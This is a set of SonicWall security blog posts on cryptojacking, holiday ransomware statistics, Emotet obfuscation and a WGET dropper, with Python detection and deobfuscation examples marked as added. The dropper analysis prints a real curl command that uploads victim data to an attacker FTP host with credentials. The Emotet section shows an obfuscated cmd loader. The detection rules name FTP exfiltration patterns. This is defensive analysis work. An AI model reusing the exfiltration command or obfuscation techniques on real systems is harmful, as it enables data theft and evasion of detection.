3 Ways to Prevent Cryptominers from Stealing Your Processing Power

Visiting a website is no longer what it used to be.

Despite this hilarious Imgur post, there is a different trend you may not have noticed: cryptomining via the browser. Many news and procrastination (e.g., BuzzFeed) websites add dozens of trackers to monetize the experience.

However, some sites may also use your browser to mine cryptocurrencies (e.g., bitcoin, Ethereum or Monero) for their own financial gain. The mining stops once you leave, but a popular new form of malware, called a cryptojacker, attempts to turn your device into a full-time cryptocurrency mining bot. Cryptojacking’s threat to your endpoint or business is based on three things:

  • The energy it consumes or wastes
  • The damage it can do to a system
  • The loss to productivity due to limited resources.

Unlike ransomware, which wants to be found (to ask for payment), a cryptojacker’s job is to run invisibly in the background, although your CPU performance graph or your device’s fan may indicate something is not normal.

Despite our vigilance and knowledge of the warning signs, a report from the Ponemon Institute stated the average length of time for an organization to discover malware or a data breach in 2017 was 191 days.

Ransomware authors have switched gears over the past two years to use cryptojacking more, because a ransomware strain’s effectiveness and ROI diminish as soon as it ends up on public feeds like VirusTotal. Like anyone else running a highly profitable business, cybercriminals need to constantly find new ways to fulfill their financial targets. Cryptojacking may solve that.

For example, the Apple App Store briefly carried a version of a free app called ‘Calendar 2’ that mined Monero cryptocurrency while open. It reportedly made $2,000 in two days before it was pulled from the App Store.

The Lure of Cryptomining

Cryptomining operations have become increasingly popular, now consuming almost half a percent of the world’s electricity consumption. Despite the wild swings in price, roughly 60 percent of the cost of legitimately mining bitcoin is the energy consumption. In fact, at the time of writing, the price of a bitcoin is worth less than the cost of mining it legitimately.

With such costs and zero risk as compared to buying and maintaining equipment, cybercriminals have strong incentives to generate cryptocurrency with someone else’s resources. Infecting 10 machines with a cryptominer could net up to $100/day, so the challenge for cryptojackers is three-fold:

  1. Find targets, namely organizations with a lot of devices on the same network, especially schools or universities.
  2. Infect as many machines as possible.
  3. Unlike ransomware, and more akin to traditional malware, stay hidden for as long as possible.

Cryptojackers use similar techniques as malware to sneak on to an endpoint: drive-by downloads, phishing campaigns, in-browser vulnerabilities and browser plugins, to name a few. And, of course, they rely on the weakest link — the people — via social engineering techniques.

How to Know if You are Infected by Cryptominers

Cryptominers are interested in your processing power, and cryptojackers have to trade off stealth against profit. How much of your CPU resources they take depends on their objectives.

Siphoning less power makes it harder for unsuspecting users to notice. Stealing more increases their profits. In either case, there will be a performance impact, but if the threshold is low enough it could be a challenge to distinguish the miner from legitimate software.

Enterprise administrators may look for unknown processes in their environment, and end users on Windows should launch Sysinternals Process Explorer to see what they are running. Linux and macOS users should investigate using System Monitor and Activity Monitor, respectively, for the same reason.
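A concrete form of the check described above, as an added example rather than code from the original post: the snapshots are constructed per-process CPU samples of the kind an administrator could collect from Process Explorer or a monitoring agent (process names, PIDs and values are invented), and the rule flags a process that stays busy across consecutive samples, which is what a throttled miner looks like even when it never spikes.

```python
"""Flag processes that keep a CPU core busy across consecutive samples.

Added example (not code from the SonicWall post). A miner that throttles
itself to stay under the user's notice still shows up as a process that
never idles, so the rule keys on persistence rather than on peak load.
"""
from collections import defaultdict

# Constructed snapshots: one dict per sampling interval, mapping
# (pid, image name) -> percent of one core used during that interval.
SAMPLES = [
    {(4120, "chrome.exe"): 35.0, (9981, "svchost.exe"): 2.0, (7322, "updater.exe"): 28.0},
    {(4120, "chrome.exe"): 4.0,  (9981, "svchost.exe"): 1.0, (7322, "updater.exe"): 31.0},
    {(4120, "chrome.exe"): 62.0, (9981, "svchost.exe"): 0.5, (7322, "updater.exe"): 27.5},
    {(4120, "chrome.exe"): 3.0,  (9981, "svchost.exe"): 1.5, (7322, "updater.exe"): 30.0},
    {(4120, "chrome.exe"): 1.0,  (9981, "svchost.exe"): 0.0, (7322, "updater.exe"): 29.0},
]


def persistent_cpu_hogs(samples, threshold=20.0, min_consecutive=4):
    """Return (pid, name) pairs that stayed at or above `threshold` percent
    CPU for at least `min_consecutive` samples in a row."""
    streak = defaultdict(int)   # current run length per process
    best = defaultdict(int)     # longest run seen per process
    for snapshot in samples:
        seen = set()
        for proc, cpu in snapshot.items():
            seen.add(proc)
            if cpu >= threshold:
                streak[proc] += 1
                best[proc] = max(best[proc], streak[proc])
            else:
                streak[proc] = 0
        # A process missing from this interval breaks its run.
        for proc in list(streak):
            if proc not in seen:
                streak[proc] = 0
    return sorted(proc for proc, run in best.items() if run >= min_consecutive)


if __name__ == "__main__":
    for pid, name in persistent_cpu_hogs(SAMPLES):
        print(f"review pid {pid} ({name}): sustained CPU use across every sample")
```

The browser's bursty usage never builds a run, while the constructed "updater.exe" sits just under 30 percent in every interval and is flagged; raising the threshold to 30 percent hides it entirely, which is the stealth-versus-profit trade-off the text describes.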

How to Defend Against Cryptominers

The first step in defending against cryptominers is to stop this type of malware at the gateway, either through firewalls or email security (perimeter security), which is one of the best ways to scrub out known file-based threats. Since people like to reuse old code, catching cryptojackers like CoinHive can be a simple first step.

If the malware strain is unknown (new or updated), then it will bypass static filters in perimeter security. If a file is unknown, it will be routed to a sandbox to inspect the nature of the file.
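How a simple static filter of the kind mentioned above catches a known in-browser miner, and why an unknown or renamed strain slips past it, as an added example that is not SonicWall code: the response bodies are constructed, and the two signatures are this example's own regular expressions based on the publicly known CoinHive loader script name and JavaScript constructor, not a vendor signature set.

```python
"""Static signature scan of HTTP response bodies for a known in-browser miner.

Added example, not code from the SonicWall post. PAGES and SIGNATURES are
constructed for illustration; a real gateway would maintain its patterns
from a threat-intelligence feed.
"""
import re

# Constructed response bodies standing in for pages a gateway would inspect.
PAGES = {
    "news-site": (
        "<html><script src='https://coinhive.com/lib/coinhive.min.js'></script>"
        "<script>var m = new CoinHive.Anonymous('SITE-KEY'); m.start();</script></html>"
    ),
    "clean-site": "<html><script src='/static/app.js'></script><p>hello</p></html>",
    # Same behaviour, but the library and constructor were renamed: a
    # signature built for CoinHive has nothing to match on.
    "renamed-miner": (
        "<html><script src='https://cdn.example.invalid/x.js'></script>"
        "<script>var m = new Miner.Anonymous('SITE-KEY'); m.start({threads: 2});</script></html>"
    ),
}

# Example signature list (this example's own patterns, not a vendor set).
SIGNATURES = [
    ("coinhive-loader", re.compile(r"coinhive\.min\.js", re.IGNORECASE)),
    ("coinhive-api", re.compile(r"CoinHive\.Anonymous\s*\(", re.IGNORECASE)),
]


def scan_page(body):
    """Return the names of every signature that matches the response body."""
    return [name for name, pattern in SIGNATURES if pattern.search(body)]


def scan_all(pages):
    """Scan a mapping of label -> body and report matches per label."""
    return {label: scan_page(body) for label, body in pages.items()}


if __name__ == "__main__":
    for label, hits in scan_all(PAGES).items():
        print(f"{label}: {'BLOCK ' + ', '.join(hits) if hits else 'no static match'}")
```

The renamed variant produces no match at all, which is exactly the gap the text says a sandbox or behavioral engine has to close.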

In the case of SonicWall Capture ATP, the multi-engine sandbox environment is designed to identify and stop evasive malware that may evade one engine but not the others.

If you have an endpoint not behind this typical set up (e.g., it’s roaming at the airport or hotel), you need to deploy an endpoint security product that includes behavioral detection.

Cryptominers can operate in the browser or be delivered through a fileless attack, so the legacy solutions you get free with a computer are blind to it.

A behavior-based antivirus like SonicWall Capture Client would detect that the system is trying to mine coins and then shut down the operation. An administrator can easily quarantine and delete the malware or, in the case of something that does damage to system files, roll the system back to the last known good state before the malware executed.

By combining a mixture of perimeter defenses and behavioral analysis, organizations can fight the newest forms of malware no matter what the trend or intent is.

To learn more about how you can defend your organization from these threats I recommend reading this white paper, “Best Practices for Protection Against Phishing, Ransomware and Email Fraud.”

Cyber Monday, Black Friday Targeted by Spike in Ransomware Attacks

Throughout the year, SonicWall tracks cyber threats around the clock. But the holiday shopping season — specifically the days around Thanksgiving — is anything but typical.

During this nine-day window, cybercriminals plan and execute cyberattacks, even before the early hours of Black Friday. They systematically build malware, ransomware and phishing campaigns to prey on busy holiday shoppers.

For the 2018 holiday shopping season, SonicWall Capture Labs threat researchers focused on the three key shopping days — Black Friday, Small Business Saturday and Cyber Monday — that anchor Thanksgiving week in the U.S.

At a macro level, malware attacks dipped in 2018, while ransomware, phishing and cryptojacking attacks all increased significantly. Over the nine-day Thanksgiving holiday shopping window (Nov. 19-27), SonicWall customers faced:

  • 91 million malware attacks (34 percent decrease over 2017)
  • 889,933 ransomware attacks (432 percent increase over 2017)
  • 45 percent increase in phishing attacks compared to the average day in 2018

Malware Volume Dips for Holiday Shopping, Still Trending High in 2018

Malware data trends represent one of the best indicators of cybercriminal tactics and big-picture strategies. After a relatively down 2016, malware volume surged in 2017 to record levels, increasing 18.4 percent, as published earlier this year in the 2018 SonicWall Cyber Threat Report. Through October 2018, malware attacks were already up 44 percent year to date.

However, U.S. malware attacks were actually down, across the board, during the Thanksgiving holiday. This moderate decline in the use of malware includes a 47 percent drop on Cyber Monday and a 40 percent decrease on Black Friday, the two biggest shopping dates of the season.

U.S. Malware Attacks | Thanksgiving Holiday

Shopping Days                        2017           2018           YoY
Thanksgiving Holiday (Nov. 19-27)    139,163,476    91,442,673     -34%
Black Friday                         13,082,216     7,797,134      -40%
Small Business Saturday              12,407,843     8,004,621      -35%
Cyber Sunday                         16,267,043     10,890,572     -33%
Cyber Monday                         22,662,090     11,927,016     -47%

This regression likely signifies that criminals are narrowing the focus to the most profitable types of attacks, such as ransomware, which spiked during the 2018 holiday shopping season.

Malware attacks dipped on each of the major shopping days in 2018, but overall malware volume has nearly doubled 2017 year to date.

As Black Friday Shoppers Stay Online, Ransomware Climbs

A decades-old tradition, Black Friday used to be the biggest shopping day of the year. But even with the emergence of Cyber Monday, more and more consumers are doing their Black Friday shopping online and not in brick-and-mortar stores.

According to Reuters, online sales surpassed $6 billion on Black Friday in the U.S. — a 23 percent jump over last year. Conversely, sales at physical retail locations dropped 4-7 percent.

And, predictably, cybercriminals were waiting. SonicWall Capture Labs threat researchers recorded 28 times more ransomware attacks on Black Friday compared to 2017. In November, the infamous Cerber ransomware variant was the most prevalent, representing 76 percent of all ransomware attacks.

U.S. Ransomware Attacks | Thanksgiving Holiday

Shopping Days                        2017        2018        YoY
Thanksgiving Holiday (Nov. 19-27)    167,388     889,933     432%
Black Friday                         4,088       113,303     2,672%
Small Business Saturday              10,171      103,611     919%
Cyber Sunday                         16,251      70,727      335%
Cyber Monday                         24,425      109,298     347%

Each major shopping day saw triple-digit jumps over the same dates in 2017. Interestingly, ransomware attacks on Small Business Saturday — likely bleed over from Black Friday — were up 919 percent over 2017.

From a volume standpoint, Cyber Monday only trailed Black Friday in total attacks, further signifying shifting cybercriminal strategies that focus on more than specific shopping days for better success. These trends continued upward for the Tuesday following Cyber Monday as well.

Ransomware attacks were up across the board for Black Friday and Cyber Monday.

In January, SonicWall Capture Labs threat researchers will analyze data and publish findings from the entire shopping season to help the industry better understand cybercriminal strategies and their shifting behavior patterns.

This cyber threat intelligence will also serve as a precursor to the 2019 SonicWall Cyber Threat Report, which will be published early next year.

Exclusive Video: SonicWall CEO Bill Conner & CTO John Gmuender

SonicWall President and CEO Bill Conner and CTO John Gmuender walk you through the current cyber threat landscape, explore the importance of automated real-time breach detection and prevention, and address how to mitigate today’s most modern cyberattacks.

SonicWall Wins Gold and Silver in Best in Biz Awards 2018

SonicWall has been named a multiple winner in the 8th annual Best in Biz Awards, the only independent business awards program judged each year by prominent editors and reporters from top-tier publications in North America.

Best in Biz Awards 2018 honors were conferred in 70 award categories across five focus areas: company; department or team; executive; product; and CSR, media, PR and other categories. SonicWall received Best in Biz honors in two categories, as a gold winner for the Most Innovative Product of the Year and a silver winner for the Support Department of the Year.

With the addition of the Best in Biz Awards, SonicWall has won 44 industry honors so far in 2018.

SonicWall’s Capture Cloud Platform took the gold award in the Most Innovative Product of the Year – SMB category. The Capture Cloud Platform combines the global security intelligence of the Capture Threat Network with the cloud-based management, reporting and analytics of the Capture Security Center and the advanced threat prevention of the multi-engine Capture ATP sandbox. This approach enables our complete portfolio of high-performance hardware, virtual appliances and clients to harness the power of the cloud.

SonicWall’s Global Support team, under the leadership of SVP and Chief Customer Success Officer Keith Trottier, was recognized with a silver award in the Support Department of the Year category. SonicWall is proud to provide dedicated, follow-the-sun service and support with global contact centers that are staffed 24/7 with technical support and customer service teams.

“All of the entries in the Service categories in this year’s Best in Biz Awards take the meaning of ‘service’ seriously – whether it is targeting individuals, companies or employees,” said Mari Edlin, Healthcare Innovation News, judging her third Best in Biz Awards competition. “Submissions represented an entirely new service, while others added an innovative touch to their other offerings, enhancing already existing, similar products. Hats off to everyone for keeping good service alive!”

Since 2011, winners in Best in Biz Awards have been determined based on scoring from independent judging panels deliberately composed each year of prominent editors and reporters from some of the most respected newspapers, TV outlets, and business, consumer, technology and trade publications in North America. Structured in this unique way, Best in Biz Awards is able to best leverage its distinguished judges’ unparalleled expertise, experience and objectivity to determine award winners from among the hundreds of entries. This year’s judging panel included writers and contributors to such publications as Associated Press, Barron’s, Consumer Affairs, eWeek, Forbes, Healthcare Innovation News, Inc., Investment Advisor Magazine, MediaPost, New York Post, New York Times, Ottawa Citizen and Wired.

For a full list of winners in Best in Biz Awards 2018, visit: http://www.bestinbizawards.com/2018-winners

About Best in Biz Awards

Since 2011, Best in Biz Awards has made its mark as the only independent business awards program judged each year by a who’s who of prominent reporters and editors selected from top-tier publications from North America and around the world. Over the years, Best in Biz Awards judges have ranged from Associated Press to the Wall Street Journal and winners have spanned the spectrum, from blue-chip companies that form the bedrock of the world economy to local companies and some of the most innovative start-ups. Best in Biz Awards honors are conferred in two separate programs: North America and International, and in 70 categories, including company, team, executive, product, and CSR, media, PR and other categories. For more information, visit: http://www.bestinbizawards.com.

Cyber Security News & Trends – 11-23-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Two Cybersecurity Policies, One Clear New Objective – The Hill

  • SonicWall CEO Bill Conner has written an op-ed with his three policy prescriptions for the U.S. government following the National Institute of Standards and Technology (NIST) Small Business Cybersecurity Act and The National Cyber Strategy being signed into law.

Historic Black Friday, Cyber Monday Threat Data Prepares Businesses, Shoppers for Holiday Cyberattacks – SonicWall Blog

  • With Black Friday and Cyber Monday upon us cybercriminals are working overtime to find a gap in your cyber defense. We look at last year’s leap in malware attacks and advise on how to protect your business.

SonicWall Launches SD-WAN, Risk Metrics and New UTM Hardware – eWEEK

  • Sean Michael Kerner, senior editor at eWEEK, speaks to SonicWall’s Lawrence Pingree about SonicWall’s recent product expansion.

5 Key Skills for Next-Gen Communicators – Commpro

  • SonicWall’s David Chamberlin was recently featured on a panel discussion, How To Stay Relevant as a Communications Executive in 2020. Commpro has pulled the discussion together into a handy infographic.

Cyber Security News

Amazon Data Breach Reveals Private Details of Customers Ahead of Black Friday – The Telegraph (UK)

  • On the eve of some of the busiest shopping days of the year, Amazon confirmed a leak of customer names and emails.

VisionDirect Blindsided by Magecart in Data Breach – Threat Post

  • After VisionDirect confirmed a data breach exposing full names, addresses, telephone numbers, email addresses, passwords and payment card data, security researchers are saying this is the latest case of the ever-prolific Magecart threat group.

Security Warning: UK Critical Infrastructure Still at Risk From Devastating Cyber Attack – ZDNet

  • With the head of the UK National Cyber Security Centre previously stating that a major cybersecurity attack is a matter of “when, not if”, a new report from the UK’s Joint Committee on the National Security Strategy says the UK is still not facing up to cybersecurity threats.

Nine Cyber Security Predictions for 2019 – CSO Online

  • Ransomware, regulation, cyberwarfare and more; CSO Online tries to predict where cybersecurity will go over the next 12 months.

Facebook Appeals Against Cambridge Analytica Fine – BBC (UK)

  • Facebook is appealing their £500,000 fine, arguing that there is no evidence that any UK citizens had their data shared with Cambridge Analytica.

L0rdix Becomes the New Swiss Army Knife of Windows Hacking – ZDNet

  • A new malware called L0rdix has been found by researchers. It still looks to be in the development stages but it already manages to combine cryptocurrency mining, data theft and the ability to avoid malware analysis.

Report Reveals Struggles of SMBs Navigating Cyber Threat Landscape – SC Magazine

  • A recent study of Small and Medium Sized Businesses found over half of those surveyed have suffered from a data breach in the past year. Most respondents blame insufficient staff or cash, and a general lack of understanding of the threat landscape. SonicWall’s Charles Ho has some suggestions.

In Case You Missed It

Emotet is back for the holidays

Two weeks ago, SonicWall Threat Research Lab researched and blogged about a large malspam campaign delivering Emotet. Emotet has come back again for the holiday season with different tactics and better obfuscation techniques. These Thanksgiving-themed spam emails are sent in very large numbers with a malicious XML attachment.

Infection Chain:

Email:

On November 20th, the spam email shown below was sent out with Thanksgiving greetings. It pretends to come from valid email addresses with valid full names.

XML:

The malicious attachment is not a Word document; it is an XML document. It looks as though a malicious Word document with VB macros and shell code was converted to XML to evade signature-based detection.

The malicious XML document’s extension was then changed from .xml to .doc so that it launches in Microsoft Word, the default program for the .doc extension.

The attachment opens in Microsoft Word and asks the user to enable macros.

Upon enabling macros, the shell code shown below is executed.

ShellCode Deobfuscation:

Escape character (^): the caret is used for obfuscation by breaking up the command string to evade signature-based detection. Stripping the carets and ignoring the semicolons in the shell code shown above yields the following.

Step 1:
Here obfuscation is done through substrings of existing environment variable values.
cmd /c C%PrOgrAMfILES(x86):~  +9, +1%D; /v: /%APPdATA:~ 6,  1% “;

Environment variables:

ProgramFiles(x86)=C:\Program Files (x86)
APPDATA=C:\Users\user\AppData\Roaming

The ProgramFiles(x86) environment variable contains the character ‘m’ at index 9, so replacing “%PrOgrAMfILES(x86):~  +9, +1%” with ‘m’, and likewise replacing “%APPdATA:~ 6,  1%” with ‘r’ (the character at index 6 of APPDATA), yields

cmd /c CmD /v:/r

Step 2:
Set the variable “cd1” as shown below.

Step 3:
“fOr /L %E IN ( +1559 -3 +2) do (sET uYi=!uYi!!cd1:~  %E,   1!) && If %E ==2 ((call %uYi:~ -520%))”
Reversed-payload obfuscation is used to encode the command. The reversed command is first stored in the environment variable “cd1” in step 2. The /L flag instructs the for loop to iterate over a range of values starting from the first value (1559), stepping by the second value (-3) until it reaches the third value (2); each iteration appends the character of cd1 at index %E to uYi. When %E reaches 2, uYi holds the string below, and its last 520 characters are executed with call.
After applying all the above steps, we get
cmd /v:ON /r “<powershell command>”
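The two tricks above, environment-variable substring expansion and the reversed for /L loop, emulated in Python as an added example (not code from the write-up). The environment variable values are the ones quoted above; the cd1 string is constructed here so that it decodes to a harmless echo command, because the real encoded payload is not reproduced; only the %VAR:~offset,length% form of substring expansion is handled, and the loop parameters are the ones from the sample (1559, -3, 2, and the trailing -520).

```python
"""Emulate the cmd.exe obfuscation seen in the Emotet maldoc walkthrough.

Added example, not code from the SonicWall write-up. ENV holds the variable
values quoted in the post; CD1 is a constructed stand-in for the real
'cd1' value and decodes to a benign echo command.
"""
import re

ENV = {
    "ProgramFiles(x86)": r"C:\Program Files (x86)",
    "APPDATA": r"C:\Users\user\AppData\Roaming",
}

# %NAME:~ [+-]offset , [+-]length %  (cmd tolerates the spaces and signs)
SUBSTR = re.compile(r"%([^%:]+):~\s*([+-]?)\s*(\d+)\s*,\s*([+-]?)\s*(\d+)\s*%")


def expand_substrings(cmd, env):
    """Resolve %VAR:~offset,length% the way cmd.exe does (names are case-insensitive).
    A negative offset counts from the end; a negative length trims from the end."""
    lowered = {k.lower(): v for k, v in env.items()}

    def repl(match):
        value = lowered.get(match.group(1).lower())
        if value is None:
            return match.group(0)  # unknown variable: cmd leaves the text untouched
        offset = int(match.group(2) + match.group(3))
        length = int(match.group(4) + match.group(5))
        start = offset if offset >= 0 else max(len(value) + offset, 0)
        end = start + length if length >= 0 else len(value) + length
        return value[start:end]

    return SUBSTR.sub(repl, cmd)


# Step 1 of the walkthrough (ASCII quote substituted for the curly one).
STEP1 = 'cmd /c C%PrOgrAMfILES(x86):~  +9, +1%D; /v: /%APPdATA:~ 6,  1% ";'


def deobfuscate_step1(cmd):
    """Strip carets, expand substrings, then drop the stray ';' and quotes."""
    cmd = expand_substrings(cmd.replace("^", ""), ENV)
    return re.sub(r'[;"“”]', "", cmd).strip()


def for_l_decode(cd1, start, step, stop, tail):
    """Emulate: for /L %E in (start step stop) do set uYi=!uYi!!cd1:~%E,1!
    followed by %uYi:~tail% (tail is negative: keep the last |tail| chars)."""
    out = []
    e = start
    while (step < 0 and e >= stop) or (step > 0 and e <= stop):
        if 0 <= e < len(cd1):  # out-of-range substrings expand to nothing
            out.append(cd1[e])
        e += step
    return "".join(out)[tail:]


def encode_for_example(payload, start=1559, step=-3, stop=2, junk="#"):
    """Build a cd1 string that the loop above decodes back to `payload`
    (constructed for the demo: every third position carries the payload,
    written so that the loop reads it out in order; the rest is filler)."""
    buf = [junk] * (start + 1)
    positions = list(range(start, stop - 1, step))
    assert len(positions) == len(payload), "payload must fill the loop exactly"
    for index, ch in zip(positions, payload):
        buf[index] = ch
    return "".join(buf)


# Constructed benign command, exactly 520 characters to match %uYi:~ -520%.
PAYLOAD = ("echo constructed-benign-sample & " * 16)[:520]
CD1 = encode_for_example(PAYLOAD)


def recovered_command():
    """Run the sample's loop against the constructed cd1 and return what 'call' would see."""
    return for_l_decode(CD1, 1559, -3, 2, -520)


if __name__ == "__main__":
    print(deobfuscate_step1(STEP1))
    print(recovered_command()[:60] + "...")
```

Because the loop visits only every third index, two thirds of cd1 is filler that a signature looking for the plain command never sees; that is why emulating the interpreter, rather than pattern matching, is the reliable way to recover the command.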

PowerShell:

The PowerShell script uses the XMLHTTP object (MSXML2.XMLHTTP) to send an HTTP request that downloads the payload, then uses the stream object to save the binary contents to a file in the system temporary path, and finally runs the payload.

Payload:

Upon execution, the initial payload drops the Emotet malware, which then connects to the C2 (command-and-control) server.

SonicWall Threat Research Lab provides protection against this threat with the following signatures:

  • GAV: MalAgent.H_13035 (Trojan)
  • GAV: Emotet (Trojan)
  • GAV: MalAgent.H_13037 (Trojan)

Trend Chart:
Find below the hits for the GAV signature “MalAgent.H_13037”

Hash:

Email:

70f2001db275cd64b4479170e577256d9c23641254ef6f6bbc86a7da06027b82

XML:

947fd45284f627d42976f1dc2e17eb37dd43572801def4c6de4aa0b59468858a
c73a1ca2ea93c9dba1b6fd987fa1921890f51b87be5e792cc4184e250c0aeecf

Payload:

efe368ee739ef9ce068bdf624df783121fd84917bc69fcb0d9faaf8fda8a84f6
e00cd6e2a69ab6d8478951333fce0d834d5bf350a4add1bc11c7c209e002520b

Infection Cycle of WGET Trojan Dropper, November 2018.

Overview:

SonicWall network sensor telemetry reported a malicious sample that displayed the following DNS and User-Agent information. So, let’s take a deeper look into the sample:

Static Sample Information:

Sample SHA-256: 816f756d39c6cf9e885c76166e2e194377e475d46e23f61ea3582c3ab5340187

Reviewing some of the static information from CFF Explorer we can see the data inside (File Info):

Unpacking Sample:

The sample is packed with UPX v3.0. Using CFF Explorer we can unpack the sample:

After we unpack the sample and load it into IDA Pro we see the following strings:

At this point we know the sample is a self-extracting installer, so we can use 7-Zip to unzip it. After unzipping the sample the directory structure will look like the following:

Script Code Base:

Examining the “upsabi.bat” batch file we see the following code:


There are multiple code paths through the script above. SonicWall’s sensor saw the following sequence:

  • execute “wdet.exe”
  • execute “qtu.exe”
  • execute “wdet.exe” a few more times for alt.bat and gptsvcer.exe
  • execute “grafil.exe”
  • dex.crt was found
  • execute “renimin.exe”
  • deleted multiple files from the machine

We will first look into “wdet.exe” next…

Wdet.exe

Examining wdet.exe we see the following strings inside IDA Pro:

We know by the analysis above that “wdet.exe” is “GNU Wget” in disguise.
You can see further information on Wget for Windows here:
http://gnuwin32.sourceforge.net/packages/wget.htm

The first part of the batch file “upsabi.bat” is to delete “updpars.exe” and copy the “nvidup.exe” over to the system32 folder. Once that is complete it will call “qtu.exe”.

HTTP Network Objects

The network objects are obtained from running and trapping the malware sample.

Let’s examine “qtu.exe” the next executable in the sequence above.

qtu.exe

Carving out “qtu.exe” from the network traffic we see this inside CFF Explorer:

From the static information the sample doesn’t seem to be packed or protected.
However, when we load the sample into IDA Pro we see the following strings:

The analysis shows that “qtu.exe” is also a self-extracting installer, which we can likewise unzip with 7-Zip. The directory structure can be seen as follows:

Inside “0.html” we see the following:


Inside the code we can find words in Russian, such as “Следующее”, which translates to “Next”.
There are many words in Russian; it would be safe to say that this component was created by Russian speakers.

One Google search on “webq wikaba” will return 75,200 results about the same malware components we are discussing here in this article. It’s a large campaign spanning many years. They keep using the same components over and over.

The next component “upsabi.bat” will try to download is “alt.bat”.

alt.bat

The wget responses received for alt.bat, the driver component, were 404. We can reference “**BAYDU-404**”.

This component is missing, as the sensor was unable to connect using the following information.

We did gain valuable information from the response in the form of two urls:

  • hxxp://cnhv.co/7utq
  • hxxp://searchguide.level3.com/search/?q= “custom location”

Response 1:

Response 2:

The next component “upsabi.bat” will try to download is “gptsvc.exe” which will rename to “gptsvcer.exe”.

gptsvc.exe OR gptsvcer.exe

The wget responses received for gptsvc.exe were also 404. We can again reference “**BAYDU-404**”.

This component is missing, as the sensor was unable to connect using the following information.

Again the same valuable information from the response in the form of two urls:

  • hxxp://cnhv.co/7utq
  • hxxp://searchguide.level3.com/search/?q= “custom location”

Response 1:

Response 2:

Taking a step back and re-examining “upsabi.bat”: the batch file moves and renames multiple files and finally arrives at downloading and executing “grafil.exe”, which we look at next.

grafile.exe

Looking at “grafile.exe” in IDA Pro we see the following strings:

The analysis shows that “grafil.exe” is also a self-extracting installer, which we can likewise unzip with 7-Zip, giving the following directory:

Examining the “filgra.bat” we see the following code:

One of the items that is saved to a .SNDR sound file is your IP Address. This enables the attacker to connect back to you. Gaining your external IP address is done by first understanding what is inside “gettip.exe”. Let’s examine it:

The file “gettip.exe” is packed with what looks like UPX v3.0; however, it is a custom derivative of it. We can walk through the packer now and unpack the sample:

First Routine is a call to LoadLibraryA:

Second Routine is a call to GetProcAddress:

The third call is to VirtualProtect:

After this sequence we will then arrive at a jump at the very bottom of the routine:

This is the jump to the original entry point (OEP): ( jmp near ptr dword_401280 ). Once we arrive at this jump at the end of the routine we can step into it, then dump the process.

Once we dump the process we can look at the code that grabs our IP address:

This is the website your IP will be uploaded to:

  • curl -T *.SNDR ftp://debrup:toperharley@grafil.ninth.biz:22
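A detection pass over process-creation records for the exfiltration traits described above, as an added example that is not part of the SonicWall analysis: the log lines are constructed in a Sysmon-like style with invented hosts, paths and credentials, and the rules key on curl or wget uploading to an FTP server with credentials embedded in the URL, the .SNDR artifact name, and a binary running from a Temp directory that reaches out to a URL (the disguised Wget seen earlier).

```python
"""Flag command lines matching the dropper's upload-and-fetch behaviour.

Added example, not code from the SonicWall write-up. LOG is constructed;
the rule names and the record format are this example's own.
"""
import re
from urllib.parse import urlsplit

# Constructed process-creation records (not real telemetry).
LOG = [
    'pid=2210 image=C:\\Windows\\Temp\\curl.exe cmdline="curl -T *.SNDR ftp://user:pass@files.example.invalid:22"',
    'pid=2214 image=C:\\Program Files\\Git\\curl.exe cmdline="curl -o out.zip https://downloads.example.invalid/tool.zip"',
    'pid=2230 image=C:\\Windows\\Temp\\wdet.exe cmdline="wdet.exe http://update.example.invalid/alt.bat"',
]

LINE = re.compile(r'pid=(\d+)\s+image=(.+?)\s+cmdline="(.*)"$')
URL = re.compile(r'\b(?:https?|ftp)://[^\s"]+')


def classify(image, cmdline):
    """Return the list of rule names that the process matches."""
    hits = []
    urls = [urlsplit(u) for u in URL.findall(cmdline)]
    # Credentials inside an ftp:// URL, as in the curl -T command above.
    if any(u.scheme == "ftp" and u.username for u in urls):
        hits.append("ftp-credentials-in-url")
    # curl -T uploads a local file; combined with FTP that is outbound exfil.
    if re.search(r"(^|\s)-T\s", cmdline) and any(u.scheme == "ftp" for u in urls):
        hits.append("ftp-upload")
    # The .SNDR file holds the victim's external IP address in this campaign.
    if ".sndr" in cmdline.lower():
        hits.append("sndr-artifact")
    # A binary living under a Temp folder that fetches or pushes over HTTP/FTP.
    if urls and "\\temp\\" in image.lower():
        hits.append("temp-binary-network")
    return hits


def scan_log(lines):
    """Map pid -> matched rules for every record that triggers at least one rule."""
    findings = {}
    for line in lines:
        match = LINE.match(line)
        if not match:
            continue  # malformed record: skip rather than guess
        pid, image, cmdline = match.groups()
        hits = classify(image, cmdline)
        if hits:
            findings[int(pid)] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan_log(LOG).items():
        print(f"pid {pid}: {', '.join(hits)}")
```

The legitimate curl download from Program Files triggers nothing, while the two Temp-resident binaries are surfaced; the credential and .SNDR rules are the high-confidence ones, and the Temp rule is the broad one that would have caught the disguised Wget even before its download targets were known.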

Other network code inside the sample:

Once again we see the Russian language ( ru ).

The other file in the directory is “curl.exe” if we throw this into CFF Explorer we see:

If you are more curious you can load “curl.exe” into IDA Pro; at this point I don’t think we need to.

Moving on back to the “upsabi.bat” we see the next set of commands which calls “renimin.exe” because dex.crt was on the machine:

  • ( if exist %windir%\dex.crt (goto renim) )

Let’s examine this file next.

renimin.exe

Static Information for “renimin.exe”:

We can unpack and unzip “renimin.exe” the same way we did the last few files.

Once complete you will have a directory listing as follows:

Let’s look at “inst.bat” first:


The first executable that runs is called “restr.exe”. It is also packed with UPX and is a self-extracting installer, which means we can also use 7-Zip to unzip the dumped “restr.exe”. The directory structure then looks like the following:

A look into “ins.bat”:


A look into “hddsmart.bat”:

Going back to “renimin.exe” directory listing we have the second batch file “intl.bat”:


Examining the “renimin.exe” directory listing and looking at the third batch file “errchk.bat”:

Summary:

The infection cycle analysis has covered many samples. Counting scripts and executables, there are close to thirty components, maybe more. The infection chain analysis is also by no means complete; feel free to examine each individual component. A small list of the components covered is below (this list is not complete):

Starting Sample: SHA-256: 816f756d39c6cf9e885c76166e2e194377e475d46e23f61ea3582c3ab5340187

SonicWall Gateway AntiVirus provides protection against this threat:

  • GAV: 4923 Murlo.JK

Historic Black Friday, Cyber Monday Threat Data Prepares Businesses, Shoppers for Holiday Cyberattacks

It’s officially Thanksgiving week in the U.S. In addition to gathering with family and friends for the traditional turkey meal, many of us get excited about the holiday shopping season, which kicks off with Black Friday, goes virtual on Cyber Monday and extends through New Year’s Day.

